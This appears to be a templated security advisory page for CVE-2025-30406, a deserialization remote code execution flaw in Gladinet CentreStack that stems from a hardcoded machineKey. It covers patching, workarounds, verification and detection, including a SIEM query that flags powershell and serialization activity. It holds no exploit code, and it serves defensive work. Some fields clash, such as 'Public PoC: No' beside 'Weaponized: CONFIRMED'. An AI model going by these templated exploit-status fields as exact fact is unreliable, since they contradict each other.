CVE-2025-30406 – This vulnerability in Gladinet CentreStack allo... (How to Fix)

📋 TL;DR

This vulnerability in Gladinet CentreStack allows remote code execution through deserialization attacks. Threat actors who obtain the hardcoded machineKey can craft malicious payloads to execute arbitrary code on affected servers. All CentreStack deployments through version 16.1.10296.56315 are vulnerable unless patched or manually secured.

💻 Affected Systems

Products:

Gladinet CentreStack

Versions: through 16.1.10296.56315

Operating Systems: Windows

Default Config Vulnerable: ⚠️ Yes

Notes: All default installations are vulnerable due to hardcoded machineKey in web.config

📦 What is this software?

Centrestack by Gladinet

View all CVEs affecting Centrestack →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete system compromise with administrative privileges, data exfiltration, ransomware deployment, and lateral movement within the network.

🟠

Likely Case

Remote code execution leading to data theft, installation of backdoors, or cryptomining malware on vulnerable servers.

🟢

If Mitigated

Limited impact if proper network segmentation, least privilege, and monitoring are in place, though RCE still poses significant risk.

🌐 Internet-Facing: HIGH

🏢 Internal Only: HIGH

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: CONFIRMED

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Actively exploited in the wild since March 2025. Attackers need to know the machineKey value, which is hardcoded in vulnerable versions.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 16.4.10315.56368

Vendor Advisory: https://gladinetsupport.s3.us-east-1.amazonaws.com/gladinet/securityadvisory-cve-2005.pdf

Restart Required: Yes

Instructions:

1. Download CentreStack version 16.4.10315.56368 or later from official vendor site. 2. Backup current installation and configuration. 3. Run the installer to upgrade. 4. Restart CentreStack services. 5. Verify the machineKey is no longer hardcoded in portal\web.config.

🔧 Temporary Workarounds

Manual machineKey removal

windows

Remove or modify the hardcoded machineKey in web.config to prevent exploitation

Navigate to portal\web.config
Locate <machineKey> section
Delete or modify the hardcoded value
Restart IIS or CentreStack services

🧯 If You Can't Patch

Network segmentation: Isolate CentreStack servers from internet and restrict internal access
Implement web application firewall (WAF) rules to block deserialization attacks

🔍 How to Verify

Check if Vulnerable:

Check CentreStack version via admin portal or examine portal\web.config for hardcoded machineKey value

Check Version:

Check CentreStack admin dashboard or examine installation directory version files

Verify Fix Applied:

Verify version is 16.4.10315.56368 or later and machineKey in web.config is not hardcoded

📡 Detection & Monitoring

Log Indicators:

Unusual deserialization errors in CentreStack logs
Suspicious process creation from CentreStack service
Unexpected network connections from CentreStack server

Network Indicators:

HTTP POST requests to CentreStack portal with serialized payloads
Outbound connections to suspicious IPs from CentreStack server

SIEM Query:

source="centrestack" AND (event_type="deserialization" OR process_name="powershell" OR cmdline="*serialize*")

📊 Metadata

CVE ID: CVE-2025-30406

CVSS v3 Score: 9.0 (CRITICAL)

CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

CWE: CWE-321

EPSS Score: 87.94% exploit probability (99.5th percentile)

CISA KEV: Actively Exploited added Apr 8, 2025

Published: April 3, 2025

Last Updated: November 5, 2025

🔗 References

https://gladinetsupport.s3.us-east-1.amazonaws.com/gladinet/securityadvisory-cve-2005.pdf Mitigation,Patch,Vendor Advisory
https://www.centrestack.com/p/gce_latest_release.html Release Notes
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-30406 US Government Resource

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2025-30406, you might also want to check these: